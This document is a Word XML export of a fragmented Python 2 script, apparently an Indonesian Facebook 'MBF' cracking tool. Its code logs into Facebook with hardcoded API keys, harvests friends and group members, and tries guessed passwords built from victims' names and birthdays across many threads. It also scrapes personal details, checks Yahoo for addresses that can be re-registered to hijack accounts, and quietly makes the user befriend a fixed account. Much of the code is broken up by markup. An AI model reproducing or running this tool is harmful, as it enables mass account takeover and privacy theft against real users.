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325"/>
        <w:gridCol w:w="27794"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB358B" w:rsidRPr="00DB358B" w:rsidTr="00DB358B">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="1140" w:type="dxa"/>
        </w:trPr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#!/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/bin/python2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# coding=utf-8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import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datetime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random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hashlib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threading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cookielib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mechanize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from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multiprocessing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pool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import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ThreadPool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from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exceptions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import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ConnectionError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from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mechanize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import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Browser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reload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setdefaultencoding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'utf8'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mechanize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Browser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set_handle_robots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False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set_handle_refresh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mechanize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_http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HTTPRefreshProcessor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max_time=1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addheaders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'User-Agent'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'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16'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\x1b[1;91mExit"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mhkbpcP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'!'+w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random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randint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-1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)]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return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cetak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cetak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mhkbpcP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index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replace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'!%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s'%i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'\033[%s;1m'%str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31+j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'\033[0m'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replace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'!0'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'\033[0m'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stdout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x+'\n'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stdout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stdout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flush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0.05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-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB358B" w:rsidRPr="00DB358B" w:rsidRDefault="00DB358B" w:rsidP="00DB3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""" \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n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\x1b[1;92mReCode \x1b[1;91m: \x1b[1;93momalip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\x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/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theomalip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\x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/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storiku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\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●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</w:p>
          <w:p w:rsidR="00DB358B" w:rsidRPr="00DB358B" w:rsidRDefault="00DB358B" w:rsidP="00DB3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""" \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n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\x1b[1;92mReCode \x1b[1;91m: \x1b[1;93Landy22granatt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\x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/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theomalip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\n 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╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/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storiku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\x1b[1;95m─╬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✫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\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●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"""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titik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'...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titik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"\r\033[1;96m[●] \x1b[1;93mSedang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masuk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\x1b[1;97m"+o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),;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stdout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flush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();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back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threads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listgrup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vulnot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"\033[31mNot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Vuln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vuln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"\033[32mVuln"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siapa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"\033[1;97mSiapa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kamu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? \033[1;91m: \033[1;92m"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\033[1;91mIsi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siapa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"\033[1;97mSelamat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datang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\033[1;92m"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"\n\033[1;97mTerimakasih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telah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menggunakan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tools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!!"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loginSC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loginSC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print"\033[1;97mSilahkan login SC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nya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dulu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bosque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\n"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username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"\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m"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password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"\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m"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username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=="dark"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and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password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fb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\033[1;92mLogin success"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</w:t>
            </w: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033[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1;91mSalah!!"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LoginSC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() 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☆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\x1b[1;93mLOGIN AKUN FACEBOOK ANDA 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☆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'\033[1;96m[+] \x1b[1;93mID/Email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pwd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'\033[1;96m[+] \x1b[1;93mPassword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'https://m.facebook.com'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mechanize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"\n\033[1;96m[!] \x1b[1;91mTidak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koneksi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114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_factory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is_html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select_form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nr=0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'email'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'pass'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pwd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submit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geturl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'save-device'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sig=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'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'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{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"api_key"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"882a8490361da98702bf97a021ddc14d"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"credentials_type"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"password"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"email"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"format"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"JSON"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"generate_machine_id"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"1"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"generate_session_cookies"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"1"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"locale"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"en_US"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"method"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"auth.login"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"password"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pwd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"return_ssl_resources"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"0"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"v"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"1.0"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}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hashlib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new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"md5"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update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sig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hexdigest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update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({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sig'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})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"https://api.facebook.com/restserver.php"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params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"login.txt"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\x1b[1;92mLogin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post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'https://graph.facebook.com/me/friends?method=post&amp;uids=gwimusa3&amp;access_token='+z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'access_token'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xdg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-open https://www.youtube.com/omaliptv'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exceptions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ConnectionError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"\n\033[1;96m[!] \x1b[1;91mTidak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koneksi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'checkpoint'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"\n\033[1;96m[!] \x1b[1;91mSepertinya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akun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anda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kena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checkpoint"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"\n\033[1;96m[!] \x1b[1;91mPassword/Email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salah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'https://graph.facebook.com/me?access_token='+toket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\033[1;91mToken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174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exceptions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ConnectionError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koneksi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"clear"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\033[1;96m]\033[1;93m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+"\033[1;97m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\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m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"\x1b[1;97m1.\x1b[1;93m Hack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facebook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MBF"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"\x1b[1;97m2.\x1b[1;93m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Lihat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daftar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"\x1b[1;97m3.\x1b[1;93m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Informasi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akun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"\x1b[1;97m4.\x1b[1;93m Yahoo clone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"\n\x1b[1;91m0.\x1b[1;91m Logout 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"\n\033[1;97m &gt;&gt;&gt; \033[1;97m"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=="1"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=="2"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grupsaya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=="3"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informasi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=="4"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unikers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=="0"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Menghapus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token'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"\x1b[1;97m1.\x1b[1;93m Crack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daftar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"\x1b[1;97m2.\x1b[1;93m Crack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"\x1b[1;97m3.\x1b[1;93m Crack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member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"\x1b[1;97m4.\x1b[1;93m Crack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file"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"\n\x1b[1;91m0.\x1b[1;91m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Kembali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pilih_super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pilih_super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235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"\n\033[1;97m &gt;&gt;&gt; \033[1;97m"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pilih_super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=="1"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\033[1;93mMengambil ID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"https://graph.facebook.com/me/friends?access_token="+toket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=="2"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"\033[1;96m[+] \033[1;93mMasukan ID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 \033[1;97m"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"https://graph.facebook.com/"+idt+"?access_token="+toket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\033[1;96m] \033[1;93mNama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\033[1;91m :\033[1;97m "+op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\x1b[1;91mTeman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!"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\033[1;93mMengambil ID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"https://graph.facebook.com/"+idt+"/friends?access_token="+toket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=="3"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'\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m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r=requests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'https://graph.facebook.com/group/?id='+idg+'&amp;access_token='+toket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asw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\033[1;93mNama group \033[1;91m:\033[1;97m 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asw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\x1b[1;91mGroup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\033[1;93mMengambil ID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re=requests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'https://graph.facebook.com/'+idg+'/members?fields=name,id&amp;limit=999999999&amp;access_token='+toket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=="4"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idlist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'\x1b[1;96m[+] \x1b[1;93mMasukan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file \x1b[1;91m: \x1b[1;97m'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idlist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readlines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strip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\x1b[1;91mFile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'\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]'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296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peak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=="0"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299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pilih_super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"\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+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titik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'...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titik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"\r\033[1;96m[\033[1;97m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✸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\033[1;93mCrack \033[1;97m"+o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),;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stdout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flush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();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\x1b[1;93mStop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CTRL+z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arg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arg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'https://graph.facebook.com/'+user+'/?access_token='+toket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first_name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+'123'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+pass1+"\n"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first_name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+'12345'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354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+pass2+"\n"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user+pass2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last_name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'123'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+pass3+"\n"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user+pass3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Bangsat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+pass4+"\n"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user+pass4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birthday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'birthday'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birthday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replace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'/'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410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+pass5+"\n"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user+pass5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Sayang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urllib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urlopen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"https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&amp;format=json&amp;sdk_version=2&amp;email="+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+"&amp;locale=en_US&amp;password="+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+"&amp;sdk=ios&amp;generate_session_cookies=1&amp;sig=3f555f99fb61fcd7aa0c44f58f522ef6"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data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access_token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\x1b[1;92mBERHASIL'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\x1b[1;92m'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'www.facebook.com'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error_msg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\x1b[1;93mCEKPOINT'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\x1b[1;97mNama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\x1b[1;97mID \x1b[1;91m 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'\x1b[1;96m[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\x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m'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+user+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 Pw:"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+pass6+"\n"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user+pass6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ThreadPool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30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,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\033[1;92mSelesai \033[1;97m....'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OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str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+"\033[1;97m/\033[1;93m"+str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cekpoint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"\033[1;96m[+] \033[1;92mCP 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tersimpan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 \033[1;97mout/super_cp.txt"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super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grupsaya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469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'https://graph.facebook.com/me/groups?access_token='+toket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gud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uh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gud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Grupid.txt'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listgrup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\033[1;92mGROUP SAYA"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\033[1;97mID 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\033[1;97mNama\033[1;91m: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)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Group \033[1;91m:\033[1;97m %s"%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listgrup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"\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt"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KeyboardInterrupt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EOFError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\x1b[1;91mTerhenti"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remove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'out/Grupid.txt'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'\033[1;96m[!] \x1b[1;91mGroup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exceptions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ConnectionError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\x1b[1;91mTidak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koneksi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\x1b[1;91mError"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informasi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"\033[1;91m[!] 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'\033[1;96m[+] \033[1;93mMasukan ID/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\033[1;91m : \033[1;97m'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\033[1;93mTunggu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sebentar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'https://graph.facebook.com/me/friends?access_token='+toket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x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\033[1;93mNama\033[1;97m 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\033[1;93mNama\033[1;97m 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529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\033[1;93mID\033[1;97m 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\033[1;93mID\033[1;97m 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\033[1;93mEmail\033[1;97m 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'email'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\033[1;93mEmail\033[1;97m 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\033[1;93mNo HP\033[1;97m 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mobile_phone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\033[1;93mNo HP\033[1;97m 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\033[1;93mTempat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tinggal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\033[1;97m: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'location'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\033[1;93mTempat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tinggal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\033[1;97m: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\033[1;93mTanggal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lahir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\033[1;97m : '+z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'birthday'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'\033[1;96m[?] \033[1;93mTanggal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lahir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\033[1;97m :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\033[1;93mSekolah\033[1;97m : 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'education'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'\033[1;91m ~ \033[1;97m'+q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'school'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'\033[1;91m ~ \033[1;91mTidak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ada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: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✖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] \x1b[1;91mAkun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"\033[1;91m[!] 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"\x1b[1;97m1.\x1b[1;93m Clone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daftar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"\x1b[1;97m2.\x1b[1;93m Clone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"\x1b[1;97m3.\x1b[1;93m Clone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member group"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"\x1b[1;97m4.\x1b[1;93m Clone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dari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file"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"\n\x1b[1;91m0.\x1b[1;91m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Kembali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"\n\x1b[1;97m &gt;&gt;&gt; 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=="1"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clone_dari_daftar_teman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=="2"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=="3"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clone_dari_member_group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589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=="4"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clone_dari_file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elif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embuh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=="0"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else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\x1b[1;91mIsi yang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benar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clone_dari_daftar_teman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599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'reset'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"\033[1;91m[!] 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'\033[1;96m[\x1b[1;97m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\x1b[1;96m] \033[1;93mMengambil email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'https://graph.facebook.com/me/friends?access_token='+toket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'\033[1;96m[\x1b[1;97m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\x1b[1;96m] \033[1;93mStart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\x1b[1;93mStop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CTRL+z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+=1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'email'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r'@.*'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'yahoo.com'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"https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=id&amp;.lang=id-ID&amp;.done=https://id.yahoo.com"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_factory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is_html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select_form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nr=0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"username"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submit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r'"messages.ERROR_INVALID_USERNAME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continue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\033[1;92mVULN"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\033[1;97mID \033[1;91m: \033[1;92m"+id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\033[1;97mEmail\033[1;91m: \033[1;92m"+mail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\033[1;97mNama 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649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MailVuln.txt'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"Email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\033[1;92mSelesai \033[1;97m....'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\033[1;91m: \033[1;97m"+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print"\033[1;96m[+] \033[1;92mFile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tersimpan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\033[1;91m:\033[1;97m out/MailVuln.txt"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"\033[1;96m[+] \033[1;93mMasukan ID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 \033[1;97m"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"https://graph.facebook.com/"+idt+"?access_token="+toket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\033[1;93mNama\033[1;91m :\033[1;97m "+op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\x1b[1;91mTeman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\033[1;93mMengambil email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'https://graph.facebook.com/'+idt+'/friends?access_token='+toket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\033[1;93mStart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\x1b[1;93mStop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CTRL+z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43*"\033[1;96m="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+=1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699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'email'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r'@.*'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'yahoo.com'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"https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=id&amp;.lang=id-ID&amp;.done=https://id.yahoo.com"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710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_factory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is_html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select_form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nr=0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"username"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submit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r'"messages.ERROR_INVALID_USERNAME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continue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\033[1;92mVULN"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\033[1;97mID \033[1;91m: \033[1;92m"+id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\033[1;97mEmail\033[1;91m: \033[1;92m"+mail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\033[1;97mNama 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TemanMailVuln.txt'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"Email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\033[1;92mSelesai \033[1;97m....'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\033[1;91m: \033[1;97m"+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print"\033[1;96m[+] \033[1;92mFile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tersimpan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\033[1;91m:\033[1;97m out/TemanMailVuln.txt"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clone_dari_member_group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'\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m 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r=requests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'https://graph.facebook.com/group/?id='+id+'&amp;access_token='+toket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asw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\033[1;93mNama group \033[1;91m:\033[1;97m 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asw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\x1b[1;91mGroup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\033[1;93mMengambil email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'https://graph.facebook.com/'+id+'/members?fields=name,id&amp;limit=999999999&amp;access_token='+toket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teman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\033[1;93mStart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\x1b[1;93mStop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CTRL+z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770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kimak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'data'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+=1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'id'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'name'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requests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"https://graph.facebook.com/"+id+"?access_token="+toket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json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loads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links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text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z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'email'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r'@.*'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'yahoo.com'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"https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=id&amp;.lang=id-ID&amp;.done=https://id.yahoo.com"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_factory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is_html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select_form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nr=0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"username"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submit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r'"messages.ERROR_INVALID_USERNAME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continue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\033[1;92mVULN"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\033[1;97mID \033[1;91m: \033[1;92m"+id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\033[1;97mEmail\033[1;91m: \033[1;92m"+mail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\033[1;97mNama \033[1;91m: \033[1;92m"+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GrupMailVuln.txt'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799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nama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"ID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"Email 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KeyError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\033[1;92mSelesai \033[1;97m....'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\033[1;91m: \033[1;97m"+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print"\033[1;96m[+] \033[1;92mFile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tersimpan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\033[1;91m:\033[1;97m out/GrupMailVuln.txt"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def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clone_dari_file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global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toket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"\033[1;96m[!] \x1b[1;91mToken invalid"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-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rf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login.txt'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time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sleep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1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keluar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mkdir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pass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system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'clear'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logo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files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"\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m"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lastRenderedPageBreak/>
              <w:t>831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total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files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total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readlines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IOError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"\033[1;96m[!] \x1b[1;91mFile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tidak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ditemukan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[]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0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jalan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✺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\033[1;93mStart \033[1;97m...'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'\x1b[1;96m[!] \x1b[1;93mStop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CTRL+z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files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readlines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for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pw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replace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+=1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mpsh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r'@.*'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yahoo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'yahoo.com'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otw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"https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=id&amp;.lang=id-ID&amp;.done=https://id.yahoo.com"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_factory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is_html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select_form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nr=0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"username"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]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br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submit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read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proofErr w:type="spellEnd"/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compile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r'"messages.ERROR_INVALID_USERNAME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"&gt;.*'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try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jok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search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klik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group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except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continue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'"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messages.ERROR_INVALID_USERNAME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"&gt;'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pek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\033[1;92mVULN"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"\033[1;96m[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➹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] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail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open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'out/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MailVuln.txt'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,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write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"Email: "+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+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'\n\n'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save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close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.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append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mail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42*"\033[1;96m="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868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</w:t>
            </w:r>
            <w:proofErr w:type="gram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'\033[1;96m[\033[1;97m</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB358B">
              <w:rPr>
                <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓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\033[1;96m] \033[1;92mSelesai \033[1;97m....'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869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print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+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str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len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berhasil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870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print"\033[1;96m[+] \033[1;92mFile </w:t>
            </w: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Tersimpan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 xml:space="preserve"> \033[1;91m:\033[1;97m out/FileMailVuln.txt"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871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raw_input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"\n\033[1;96m[\033[1;97mKembali\033[1;96m]"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872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menu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873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874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875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876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if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__name__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==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'__main__'</w:t>
            </w:r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:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB358B" w:rsidRPr="00DB358B" w:rsidTr="00DB358B"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877</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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58B" w:rsidRPr="00DB358B" w:rsidRDefault="00DB358B" w:rsidP="00DB358B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877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:rsidR="00DB358B" w:rsidRPr="00DB358B" w:rsidRDefault="00DB358B" w:rsidP="00DB358B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spellStart"/>
            <w:r w:rsidRPr="00DB358B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>siapa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB358B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()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00224E53" w:rsidRDefault="00224E53"/>
    <w:sectPr w:rsidR="00224E53" w:rsidSect="00224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58B"/>
    <w:rsid w:val="00224E53"/>
    <w:rsid w:val="00DB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35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B358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-v">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="diff-text-marker">
    <w:name w:val="diff-text-marker"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB358B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="x">
    <w:name w:val="x"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB3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5705</Words>
  <Characters>32521</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>271</Lines>
  <Paragraphs>76</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>38150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2024-11-22T14:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-22T14:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>